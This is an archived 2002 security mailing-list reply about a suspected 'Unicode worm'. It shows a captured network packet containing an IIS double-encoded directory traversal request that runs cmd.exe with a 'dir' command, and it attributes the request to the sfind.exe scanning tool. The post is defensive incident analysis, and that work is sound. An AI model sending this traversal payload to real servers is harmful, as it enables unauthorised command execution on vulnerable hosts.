Re: Unicode worm?
From: pj@esec.dkDate: 08/23/02
- Previous message: Turner, Keith (Contractor): "RE: Unicode worm?"
- Maybe in reply to: Turner, Keith (Contractor): "Unicode worm?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: "'incidents@securityfocus.com'" <incidents@securityfocus.com> From: pj@esec.dk Date: Fri, 23 Aug 2002 13:43:25 +0200
I think the single-request attack you describe corresponds to this payload:
06/17/02-18:12:39.590684 192.84.105.44:2468 -> X.X.X.X:80
TCP TTL:108 TOS:0x0 ID:3615 IpLen:20 DgmLen:99 DF
***AP*** Seq: 0xC14916B Ack: 0xC6B3FB9C Win: 0x40B0 TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
32 35 35 63 25 32 35 35 63 2E 2E 2F 77 69 6E 6E 255c%255c../winn
74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 t/system32/cmd.e
78 65 3F 2F 63 2B 64 69 72 0D 0A xe?/c+dir..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
If Unicode translation is applied %255c%255c is seen as %5c%%5c,
This request is sent by the unicode option of the sfind.exe tool. Sfind.exe
origins from China, I have seen it used in different toolkits for
semi-automated establishment of Warez "FXP" servers on vulnerable IIIS
servers, see http://www.esec.dk/pubstro.pdf
best regards
Peter Jelver
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
- Previous message: Turner, Keith (Contractor): "RE: Unicode worm?"
- Maybe in reply to: Turner, Keith (Contractor): "Unicode worm?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
